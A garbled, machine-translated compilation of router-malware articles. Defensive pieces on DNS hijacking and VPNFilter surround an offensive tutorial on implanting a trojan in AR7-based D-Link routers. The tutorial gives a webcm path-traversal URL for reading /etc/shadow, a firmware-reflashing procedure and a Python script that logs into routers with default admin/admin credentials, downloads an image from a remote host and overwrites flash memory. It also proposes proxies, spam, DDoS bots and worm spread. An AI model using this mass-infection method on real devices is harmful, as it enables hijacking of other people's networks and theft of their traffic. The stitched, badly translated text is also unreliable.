It may seem strange to you, but there are viruses that do not infect computers, laptops, or mobile devices, and routers.
Why do this? Then, although your router does not store any valuable information, Access to this device will allow you to change the parameters of the DNS server. This, in turn, will allow scammers to forward some of your requests to fake sites where you enter confidential information useful to scammers. Many models of routers are susceptible to infection, the list is pointless, since it can be constantly updated. For your safety, I recommend with recommendations that will allow you to avoid infection.
How does a virus work?
Your computer gets infected with a virus called Win32.Sector. That, in turn, downloads Trojan.Rbrute from a special server, which searches the network for routers and tries to access the configuration. After gaining access, it changes the current DNS addresses, registered in the router, to their own. Then, all devices connected to the router end up on the page from which Win32.Sector is downloaded.
- The "Internet" icon is on, but you cannot get to most of the sites, or the wrong sites are loaded that you wanted to open
- Incomprehensible sites open spontaneously
- The computer cannot obtain an IP address from your network (it is assigned an address like 169.254.xxx.xxx on the Microsoft subnet)
How to remove Trojan.Rbrute virus from router?
- First, you need to reset the router settings to factory settings. To do this, hold down the "Reset" button on the back of the router and wait 10 seconds until the router blinks with all the indicators and reboots.
2. We go to the administrator panel of the router and change standard password access to the admin panel on your own, preferably more difficult.
3. We configure the router again, check if the Internet is working properly.
4.From the official website of the router manufacturer, download latest firmware for your model and sew it. Most likely in latest version the firmware holes through which the attackers gained access to the router's settings are closed.
5. After that, we check the computer for malware in order to exclude the possibility that WinSector or Trojan.Rbrute remained on the hard disk of the computer. You can do it free funds from article
I hope my article helped you =)
Hello my reader! In this article I will talk about wonderful ADSL routers
- irreplaceable at home and industrial networks pieces of iron. I'll tell you about the question
exploitation of these pieces of iron for purposes beneficial to us - sewing in a brutal
Trojan inside the router. And in such a way that neither
smart admin, no eared user.
IQ wishes or requirements
When I wrote this article, I assumed that reading it would be enough
advanced user with GNU \ Linux installed, who also has some skills
work and programming in this operating system... However, it appears
it is possible to repeat my actions on Windows (using Cygwin, for example), but
it will not be described. For maximum pleasure, you also need
skills in owning a soldering iron (this is optional).
And it all began ...
Something I got distracted. So, it all started with how one day this very
a piece of iron, or rather, it treacherously cut off the Internet connection and did not
wanted to restore it. At the same time, she was far away, with physical access
there was no one to see her (however, something I lied to - I was just too lazy to get up off the couch
restart the router :)), the web interface did not respond, but I remembered that on
this thing must be telnet or ssh. Go to the administration area i
have not tried before and have not recklessly changed the password to my account(how
it turned out later, in vain, because by default it is "admin: admin"). So I
tried SSH and it worked!
$ ssh [email protected]
$ Password:
Like a bolt from the blue! BusyBox! Never thought about under whose
this router is under control, it turns out - GNU / Linux! I felt creepy
I wonder how everything works here, and, mentally, thanks to laziness and chance, I
embarked on a study.
Collection of information
So where did I start? Of course from the list available commands:
# busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, yes
The set is quite sane, enough for normal research and implementation of ideas.
The next one aroused interest in the kernel version:
# cat / proc / version
Linux version 2.4.17_mvl21-malta-mips_fp_le ( [email protected]) (gcc version 2.95.3
20010315 (release / MontaVista)) # 1 Thu Dec 28 05:45:00 CST 2006
For reference: MontaVista is an embedded-oriented distribution
systems. The vast majority of manufacturers network equipment give away
preference for this system. It can also be found on other devices, for example, in
e-books or cell phones.
# cat / etc / versions
CUSTOMER = DLinkRU
MODEL = DSL-500T
VERSION = V3.02B01T01.RU.20061228
HTML_LANG = EN.302
BOARD = AR7VW
VERSION_ID =
CPUARCH_NAME = AR7
MODEL_ID =
FSSTAMP = 20061228055253
# cat / proc / cpuinfo
processor
: 0
cpu model
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
wait instruction: no
microsecond timers: yes
extra interrupt vector: yes
hardware watchpoint: yes
VCED exceptions: not available
VCEI exceptions: not available
AR7 is a dual-core chip developed by Texas Instruments. He
contains a full-fledged ADSL router on one chip supporting ADSL1 standards,
ADSL2, ADSL2 +. Based on high performance MIPS 4KEc RISC processor, with
clock frequency 175 or 233 (depending on production technology: 18 microns
or 13 microns). The chip contains on board 2 UART interfaces, one of which (UART_A)
is used to display debug information, as well as an EJTAG interface that serves
for debugging (flashing) Flash memory. The use of these interfaces will be
described below.
Finally, I looked at the memory information:
# cat / proc / mounts
/ dev / mtdblock / 0 / squashfs ro 0 0
none / dev devfs rw 0 0
proc / proc proc rw 0 0
ramfs / var ramfs rw 0 0
# cat / proc / mtd
dev: size erasesize name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
Naturally, not forgetting about the block addresses:
# cat / proc / ticfg / env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
From the above, it followed that Flash memory (/ dev / mtdblock) has 5 blocks:
mtd0- image file system SquashFs. This is a special file
a compressed read-only system. For
compression uses the gzip algorithm, but in in this case- LZMA (compression ratio
above). The size of this block is 4 MB.
mtd1- this block contains the MontaVista kernel compressed by the LZMA algorithm
condition, block size 600 KB.
mtd2- Bootloader ADAM2, performs kernel boot, also has
service FTP server for recovery and flashing. More details about him will be
said further. The block size is 64 KB.
mtd3- shared between configuration data and environment
(environment variables) block, which can be viewed in / proc / ticfg / env.
The configuration data is located in /etc/config.xml. Intermediary between file
system, the configuration block is a closed one (like all cm_ *, control, oh
them later) the cm_logic program. The size of this block is also 64 KB.
mtd4- this contains the signature of the firmware, the kernel and the image of the file
systems. This block is used when updating the firmware via the Web interface.
Initially, it is stored in this block, then the checksum is checked
and, if it converges, signs up for its new position.
RAM (16 MB in this model, but ADAM2 in this model
sees only 14 MB, is treated with an update), mounted to the / var directory, and its
you can safely use for our purposes:
#free
total used free shared buffers
Mem: 14276 10452 3824 0
Let's not forget to go over the list of processes. Of the interesting ones lurked here
daemons: thttpd - Web-server; dproxy - caching DNS queries proxy server; ddnsd
- DNS daemon; pppd ... - the actual daemon that implements the connection via the protocol
PPP, and in the parameters we see the account data. So, if the router does not
pretends to be a hose (read - not in bridge mode), then you can
easy to get hold of an account.
The cm_ * programs are proprietary and are already included in the source codes.
compiled (these programs are also developed by Texas Instruments, on D-Link
you should not swear for non-compliance with licenses).
cm_logic- a program that controls the logic of the system, through it
configuration goes through; synchronizes /etc/config.xml with
the corresponding part of the contents of / dev / ticfg (pointing to mtd3).
cm_cli- interface command line for management and configuration
systems. For example, connection settings are made through this interface.
cm_pc- runs and monitors processes, links to rules
(for example, run the program as a daemon, the rules also include information about
ports to open) described in /etc/progdefs.xml; loaded immediately after
kernels.
webcm- CGI interface, full of holes, for example allows you to look at / etc / shadow,
just by referring to the url.
http://192.168.1.1/../../../etc/shadow
Got nothing, thttpd is not so simple, but if so:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Another thing. This can be used to collect information if there is no access to
ssh / telnet, but there is access to the web interface.
firmwarecfg- used for firmware via the Web interface. At the entrance
of this program, an image is sent from the Web interface by a POST request, and it is already
redirects to Flash memory after checking checksum image.
This completes the collection of primary information, it's time to move on to decisive
actions.
Installing development tools and compiling the firmware
Firmware D-Link routers(and all the others based on GNU / Linux)
distributed under the GPL license, you can get them at the official
FTP server. In fact, you can choose any from the list of suggested firmwares,
they are the same (regarding the T-series). The delivery contains the source code of the kernel, environment,
necessary tools and toolchain to develop / compile existing
programs. It should be unpacked to the root and added to the environment variable
PATH path to the toolchain bin-directory:
$ tar xvf tools.tgz
$ export PATH = $ PATH: / opt /
Now to compile your own firmware, go to the directory
with source codes and execute this same make.
$ cd DSL / TYLinuxV3 / src && make
Many questions will be asked about enabling device support (better
answer them positively). At the end of compilation in the TYLinuxV3 / images directory
firmware images will be created. You can also run the script of the same name with yours
model from the / TYLinuxV3 / src / scripts directory.
A few words about transferring files between a router and a computer. The very first
the method that I applied is the ability to transfer files using the SSH protocol,
using the scp program. But a little later I found out that mc (Midnight
Commander) also has the ability to connect via SSH (Panel -> Shell connection).
Alternatively, you can set up a Web or FTP server at your workplace. Later i
gave preference to the Web server, because it works the fastest. I installed
thttpd, small and fast, just like on a router. We start it up and pull it on
router file, after going to the / var directory (it, as mentioned
previously available for recording).
$ thttpd -g -d ~ / ForRouter -u user -p 8080
# cd / var
# wget http://192.168.1.2/file
To pull the file from the router, you can also bring up the Web-server:
# thttpd -g -d / var -u root -p 8080
Pay attention, if you want to download the executable file from the router, you should
remove launch rights. When downloading a large number files from the router
it's better to use mc, you won't need to copy the files to / var first and
remove the rights, and then delete these files to free up space. In general, the case
taste, choose any option that suits you.
Creating your own program
Let's start, of course, with the programming classic HelloWorld. Some special
there are no rules. The text of the program is painfully familiar:
#include
#include
int main (void)
{
printf ("Mate.Feed.Kill.Repeat.");
return 0;
}
Compile (the path to the toolchain must be specified in the environment variable
PATH):
$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell
# cd / var
# chmod + x hell
# ./hell
And ... nothing will happen, or the path notification will be thrown out not found... What is
a business? I have already spoken about cm_pc - this program launches others in
according to the rules described in /etc/progdefs.xml. Now the time has come
modify and flash filesystem images.
File system modification
In order to modify the file system, you first need to
unpack. As I mentioned, the filesystem here is SquashFs with the LZMA patch.
The package for developing firmware includes only the mksquashfs program (to create
image), unsquashfs (for unpacking) is missing. But it doesn't matter, everything is available
on the file system site, we need the first version. By applying an LZMA patch and
having collected the utilities, we put them in a convenient place. First, we get the image
file system from the router:
# cat / dev / mtdblock / 0> /var/fs.img
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs
Now you can modify it as you like, or we can throw FuckTheWorld into
directory / bin and add a rule to run in /etc/progdefs.xml.
$ cp hello unpacked_fs / bin
$ vim unpacked_fs / etc / progdefs.xml
And add this (between the tags
We save and pack back:
$ mksquashfs unpacked_fs my_fs.img -noappend
Please note that the file system image should not exceed
permissible sizes. If you have an urge to try something urgently, and it does not
fit, remove from the image something "unnecessary" like grep, whoami, or
use the packer executable files UPX. Now upload to the router
image and move on to the next section.
File System Image Capture
The method of flashing the router is very simple, it consists in accessing the device
/ dev / mtdblock / *. So, we fill the router with any in a convenient way file image
systems and do this simple action:
# cat my_fs.img> / dev / mtdblock / 0 && reboot
# cp my_fs.img / dev / mtdblock / 0 && reboot
After a while, when the recording process has passed, the router will reboot, and
the changes will take effect. Trying to run our example:
# hell
Mate.Feed.Kill.Repeat.
Recovery methods in case of failure
Before flashing the router with more serious "crafts", you should find out how
how to act in critical cases when the router refuses
load. There are no hopeless situations. The ADAM2 FTP server comes to the rescue. For
first you need to run the FTP client to the IP address of ADAM2, which can be spied on
in / proc / ticfg / env (my_ipaddress parameter).
$ ftp 192.168.1.199
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.
For clarity, you can enable debug mode, then all
info and all FTP responses:
Login / password - adam2 / adam2. The flashing process is very simple. To start
transfer the FTP session to binary mode:
ftp> quote MEDIA FLSH
Now we send, for example, an image of the file system and indicate the location
destination:
ftp> put fs.img "fs.img mtd0"
We are waiting for the end of the recording, reboot the router, exit the session:
ftp> quote REBOOT
ftp> quit
Everything! As you can see, there is nothing difficult, now if something goes wrong, you
you can always fix the situation.
For the convenience of work, you should give a normal IP address, enable
automatic loading (so as not to dance with reset) and slightly increase the time
waiting for a connection before loading the kernel. All these parameters are stored in
environment variables, there are special FTP commands ADAM2: GETENV and SETENV (for
getting and setting a variable, respectively). V FTP sessions introduce the following
commands:
ftp> SETENV autoload, 1
ftp> SETENV autoload_timeout, 8
ftp> SETENV my_ipaddress, 192.168.1.1
ftp> quote REBOOT
ftp> quit
The router reboots and you can log into ADAM2 at 192.168.1.1:21. If
there will be a desire to reflash the kernel image, and the kernel will refuse to boot, FTP
will start itself. Before flashing modified images, be sure to
save current for recovery. In general, you can change environment variables
and via / proc / ticfg / env, I just wanted to tell you more about working with FTP.
# echo my_ipaddress 192.168.1.1> proc / ticfg / env
And you can check the changes like this:
# cat / proc / ticfg / env | grep my_ipaddress
What to do if you wanted to try reflashing the bootloader, and how
to act in case of failure? Either the router does not start for some reason, and
no access to ADAM2? There is a way out - JTAG, or rather, this chip contains EJTAG
(extended version). It is an interface for in-circuit debugging / programming.
To connect to this interface, we need the LPT port of the computer,
connectors and 4 resistors. The scheme is very simple.
I hasten to note that firmware via JTAG is not quick, it will take enough
a lot of time. So it's worth using only to restore the bootloader,
even if it doesn't work. To communicate via JTAG, you should use a special
a program such as UrJTAG. Below is an example of how this interface works.
Establishing a connection:
jtag> cable parallel 0x378 DLC5
jtag> detect
Flash memory detection:
jtag> detectflash 0x30000000 1
Reading Flash Memory:
jtag> readmem 0x30000000 0x400000 fullflash.img
Writing to memory (bootloader):
jtag> flashmem 0x30000000 adam2.img
It is also useful to know about the UART interface (I promised to talk about it earlier). V
UART_A reports, that is, logs the bootloader (at an early stage of loading from
you can talk to him) and the core. When writing modified kernels it is
indispensable for debugging. UART - Universal Asynchronous Receiver / Transmitter
(universal asynchronous transceiver) is almost always present on
microcontrollers.
The adapter circuit is very simple. Based on only one microcircuit -
TTL level converter: MAX232 for COM and FT232R for USB. Microcircuits
are quite common and there will be no problems with the purchase.
The circuit is going to breadboard(which can be safely placed in the case
COM port connector) in 20 minutes and brings a lot of benefits. For example, when debugging
kernels are an absolutely irreplaceable solution. And if the electronics are tight? Exit
are USB-cords for old phones, they just have a converter
UART - USB.
Some distribution ideas
Your proxy / sox on someone else's router is great. As, in fact, and spam
over all protocols router. This is not a Windows computer for you, which
rearranged every month :). Routers often do not change or reflash. Yes and
Who besides us will get the idea of a router infection in their heads?
Don't forget, we have all the traffic from the user / network under our control. For more
powerful routers, it is already possible to hang a DDOS bot. Hide file / hide process,
intercept writing to mtd blocks, eliminating the erasure of our program - everything that
whatever!
Let's say you are about to start writing a serious program for a router.
Very good debugging is important, you will probably have to a bunch of times
rewrite / restore images ... This is a very sad prospect. Even hands
they go down a little, if we also take into account that the rewriting resource of Flash memory
small (for more details see the documentation for the memory chip), and there is a prospect
ditch her. But there is a way out! Qemu can emulate AR7! Can you imagine what
does it provide possibilities and endless convenience? Now nothing stands in our way
write something incredibly cool!
So. You wrote a program, checked it on your own or 1-2 other people's routers, but after all
the whole network is still ahead, manually infecting is dreary, you already start on the 10th router
curse the whole world, and floats in the eyes of the strings of "cat" and "mtd". We will write
program to automate these routine activities... I chose the python language.
The work plan is as follows:
- compiling a list of routers, for example, using nmap;
- the script should take from the list in order of the IP address, go through
telnet with a standard login / password; - then the same actions: upload the modified image,
overwrite, reboot.
#! / usr / bin / env python
# Encode = UTF-8
import telnetlib, time
SERVER = "http://anyhost.com/fs.image"
for addr in open ("iplist.txt"):
telnet = telnetlib.Telnet (addr)
telnet.set_debuglevel (1)
telnet.read_until ("login:")
time.sleep (5)
telnet.write ("admin \ n")
telnet.read_until ("Password:")
telnet.write ("admin \ n")
telnet.read_until ("#")
telnet.write ("cd / var && wget" + SERVER)
telnet.read_until ("#")
telnet.write ("cat fs.image> / dev / mtdblock / 0")
telnet.read_until ("#")
telnet.write ("reboot")
telnet.close ()
The logic of the script is very far from ideal, now I will explain why. For
first, you should check the firmware / kernel version and the router model, because there may be
serious differences in work. Further, instead of blanks of firmware, you should pump out
file system image from the router, unpack, modify and send
back. This will eliminate compatibility issues across different
models / firmware versions, because the stability of work is the most important thing for you.
Also, the virus can have the functions of a worm, and, if you wish, you can always
screw a network scanner, brute force for RDP and similar chips to it.
There is another great distribution method. Nothing prevents you from writing
program for Windows, which will have with you (or download from your
server) image of the file system and infect the router with it, if present.
Redistribute this program by all "standard" means: removable drives,
exploits for programs, infecting other programs ... By combining these methods,
you can create a serious pandemic. Just imagine this picture - after all
similar devices are ubiquitous.
Router protection
Having dug up all this, I thought: how can you protect a router? And then, you see, and
I'll get it myself. The first step is to change the user password to a more complex and
long (limit - 8 characters), change banners and service greetings
(with a hex editor, or, which is preferable, recompile the programs), so that
nmap or other scanners were unable to detect service versions.
You should also change the ports on which the daemons hang. This is done by
modifications progdefs.xml. Kill telnet (the easiest way to find a password for it, yes
and the protocol is unprotected, why do we need it), turn on the firewall, allow the connection
to services only from your own IP or MAC address. Also use a firewall
to protect a network or computer, it's not in vain that it is present. Competent setting
rules will always help you defend yourself.
Conclusion
Many, not only D-Link routers and other similar devices are built on
AR7 chip, the list includes Acorp, NetGear, Linksys, Actionec ...
this AR7 is popular together with MontaVista. Hence it follows that using the same
toolchain, without special problems you can follow the steps described in the article.
Think about it: besides malicious actions you can do something useful / pleasant for yourself
and others (I do not argue, the pleasure of hacking cannot be replaced, but still).
You can make your own firmware, for example, more powerful routers capable of
download / distribute torrents ... All models have a USB 1.1 interface, but in the younger
models, it is not soldered. Add a USB module and file system driver to the kernel,
equip the router with Flash memory - and in the end you get something like network storage per
little money. There are a lot of options, and ideas should arise in thousands - not
limit yourself, create and create!
Earlier, we wrote about DNS spoofing, as a result of which advertisements and ransomware banners appeared on the computer. In some cases, the DNS servers have been changed not only in Windows, but also on the router. Technically speaking, DNS substitution is, of course, not a virus in the classical sense of the word, but a malicious setting, which nevertheless brings a lot of inconvenience.
What is the point of spoofing DNS servers and what is the harm from it
The DNS server is responsible for mapping domain names to IP addresses. Fraudulent DNS servers are capable of matching the name of any decent site with another - the wrong address, and download spoofed content instead of the genuine one. If you register such "wrong" DNS on the router, then all devices connected to it will be in danger.
It looks like this. While browsing sites, a page suddenly opens with a proposal to update the flash player, java, install free antivirus, download a program supposedly to speed up and optimize your PC or any other seemingly harmless thing. It is important that the name of a familiar and trusted site can be displayed in the address bar. If the user downloads and runs the proposed file, then most likely in the near future he will start big problems from PC:
- Your computer might start showing advertisements.
- Files can be encrypted.
- When trying to open any site, a request may appear.
- The desktop can be blocked by a winlocker, again with the requirement to transfer money for unlocking.
- A computer can be used to carry out Internet attacks on sites and servers, hack other computers (botnet) and other bad things.
At the same time, as a rule, the speed of the PC decreases, there are constant calls to hard disk, CPU utilization reaches 100% when idle.
How the router gets infected
As a rule, first, one of the computers in local network... The virus enters the computer when downloading a file from the Internet. Then, he sends requests to the standard addresses for network equipment, can scan cookies, download ancillary malware (Trojan) and as a result gets into the settings of a router or ADSL modem.
Viruses and Trojans can change router settings (in particular, spoof DNS) if:
1. To enter the web interface, use standard details- IP, login and password (for example, 192.168.1.1, admin / admin)
2. The address, login and password of the router are saved in the browser.
Signs of a router infection
(both all together and separate signs can occur)
1. On devices that are connected to the router, advertisements pop up, browsers open left tabs / pop-ups on their own, a ransomware banner on the whole screen may appear.
2. Some sites do not open. Instead, web pages with strange content or a "404" error are displayed.
3. No Internet access although the WAN / Internet LED is on.
4. The computer obtains an IP address from the range 169.254. *. *
How to remove a virus from a router
How to protect your router from viruses
1. Update the firmware to the latest
Go to the manufacturer's website, enter your model, and download the latest firmware. Read on for example TP-Link equipment.
2. Set a custom password for the web interface
Not all routers allow changing the login. But if you install complex password, it'll be enough.
3. Deny logging into the router interface from the Internet
4. Change the IP address of the router in the local network
Do not even doubt that the first thing a router cracker virus will do is access the most popular addresses: 192.168.0.1 and 192.168.1.1. Therefore, we advise you to change the third and fourth octets local IP address v LAN settings... Set for example:
192.168.83.254
After that, all devices on the network will receive IP from the 192.168.83 range. *
After changing the local IP of the router, to enter the web interface, you will need to enter http: // [new address]
5. Install a reliable antivirus on your computer
Even if malware penetrates the computer, it will be neutralized and will not have time to infect the router.
6. Do not save passwords in the browser
I think you are able to remember the password from the router's web interface. Or at least write it down on paper.
In light of the increased incidence of substitution DNS malware programs on the devices of Internet users, the question arises Wi-Fi security routers. How to check a router for viruses? How to remove a virus in a router? The question is complex and simple at the same time. There is a solution!
The virus itself cannot write itself to most modern routers due to the small space in the memory of the router itself, but it can zombify the router to participate in a botnet. As a rule, this is a botnet for attacking various servers, or for redirecting and analyzing information streams leaving you on the Internet.
Your passwords and personal correspondence can fall into the hands of intruders!
This needs to be fixed as soon as possible.
- Resetting the router settings
- Router firmware
- Reconfiguration
Resetting the router settings
You can reset the router settings by pressing the reset button. Usually this button is located on the back of the router, where and LAN ports... Usually the button is recessed into the hole to avoid accidental pressing, so you have to use a toothpick. it will delete the settings of the router changed by the virus, and install the factory settings in their place. I must warn you that if you do not know how to configure the router, then dump its settings to you not worth it!
Router firmware
Sometimes the virus "floods" modified firmware to the router. You can remove the virus firmware from the router by flashing the router again.
Connect the computer to the router with a LAN cable. LAN cable Comes with any router. Or via Wi-Fi if there is no cable connection. Better to connect with a cable! Wireless connection considered unstable and not suitable for router firmware.
After we have connected to the router, open the browser (Chrome, Opera, Mozilla, IE) and enter in address bar address ASUS router, for asus it is 192.168.1.1, on the page that opens, you will need to enter a username and password to enter the router settings. Login: admin, Password: admin. If the login and password are not suitable, then ask the one who set up the router for you, maybe he changed them.
Download the firmware from the manufacturer's website and select the firmware on the disk using the router settings page. For the vast majority of routers, the firmware stages are the same.
A few weeks ago, specialists in information security called VPNFilter. As it turned out, main goal of this malware are the routers of the most different manufacturers... One of the first to draw attention to VPNFilter was a team of information security specialists from Cisco Talos.
The malware is constantly being improved by its developers. Was recently discovered new module which uses a man-in-the-middle attack type against incoming traffic... Attackers can modify the traffic passing through the router. They can also redirect any data to their servers without any problems. The virus module was named ssler.
In addition to modifying incoming traffic, ssler can also transfer victim's personal data to its creators. These can be passwords to different kinds resources that cybercriminals then use for different purposes.
To prevent theft personal information usually TLS encryption is used, which malware can bypass. This is done by downgrading HTTPS connections to HTTP traffic that is not protected by anything. The request headers are then replaced, signaling that the access point is vulnerable. Ssler in a special way modifies the traffic of various resources, including Google, Facebook, Twitter and Youtube. The fact is that these services provide additional protection... TO Google example redirects HTTP traffic to HTTPS servers. But the module allows you to bypass this protection so that attackers receive unencrypted traffic.
Since the discovery of the virus, information security experts have been studying its possibilities. Now it turned out that he is more dangerous than it was thought. Previously, for example, Cisco experts argued that the main task cybercriminals - infection network devices in company offices and victims' homes. Perhaps to form a botnet. But now it turned out that it is users, or rather their data, that is the main goal.
“Initially, when we discovered the virus, we believed that it was created to implement various kinds of network attacks... But it turned out that this is not at all the main task and possibility of the malware. It was created mainly to steal user data and modify traffic. For example, a virus can change traffic in such a way that a client-bank user will see the previous amount on his account. But in fact, there is no money there for a long time, ”- says the report of cybersecurity experts.
Interestingly, most of the infected devices are located in / in Ukraine. Safeguards like HTTP Strict Transport Security are not common here, so user data is at risk. But there are problems in other countries as well - for example, in the USA and Western Europe, many morally obsolete devices do not support working with HTTPS, continuing to use HTTP.
Earlier it was reported that the most vulnerable models of routers for this virus are devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. In fact, the range of devices vulnerable to the virus is much wider. This includes models from Linksys, MikroTik, Netgear and TP-Link.
Full list vulnerable devices
Asus:
RT-AC66U (new)
RT-N10 (new)
RT-N10E (new)
RT-N10U (new)
RT-N56U (new)
RT-N66U (new)
D-Link:
DES-1210-08P (new)
DIR-300 (new)
DIR-300A (new)
DSR-250N (new)
DSR-500N (new)
DSR-1000 (new)
DSR-1000N (new)
Huawei:
HG8245 (new)
Linksys:
E1200
E2500
E3000 (new)
E3200 (new)
E4200 (new)
RV082 (new)
WRVS4400N
Mikrotik:
CCR1009 (new)
CCR1016
CCR1036
CCR1072
CRS109 (new)
CRS112 (new)
CRS125 (new)
RB411 (new)
RB450 (new)
RB750 (new)
RB911 (new)
RB921 (new)
RB941 (new)
RB951 (new)
RB952 (new)
RB960 (new)
RB962 (new)
RB1100 (new)
RB1200 (new)
RB2011 (new)
RB3011 (new)
RB Groove (new)
RB Omnitik (new)
STX5 (new)
Netgear:
DG834 (new)
DGN1000 (new)
DGN2200
DGN3500 (new)
FVS318N (new)
MBRN3000 (new)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (new)
WNR4000 (new)
WNDR3700 (new)
WNDR4000 (new)
WNDR4300 (new)
WNDR4300-TN (new)
UTM50 (new)
QNAP:
TS251
TS439 Pro
Other QNAP NAS with QTS
TP-Link:
R600VPN
TL-WR741ND (new)
TL-WR841N (new)
Ubiquiti:
NSM2 (new)
PBE M5 (new)
Upvel:
Unknown Models * (new)
ZTE:
ZXHN H108N (new)
And that is not all
In addition to everything that was announced above, Talos reported the discovery of a sniffer module. It analyzes traffic in data search of a certain type that are associated with the operation of industrial systems. This traffic goes through TP-Link R600, which is determined by the module. In addition, the module looks for IP addresses from a specific range, as well as data packets that are 150 bytes or more.
“The creators of the virus are looking for very specific things. They don't try to collect as much as possible. available information, not at all. They need passwords, logins, access to a specific IP range and the like. We are trying to understand who might need all this, ”the researchers say.
But that's not all, because now the virus is being updated, a self-destruction module has appeared in its functionality. When the module is activated, the virus is removed from the device without any traces.
Despite the fact that about a week ago, the FBI discovered and seized main server, the botnet is still active, measures taken was clearly not enough.
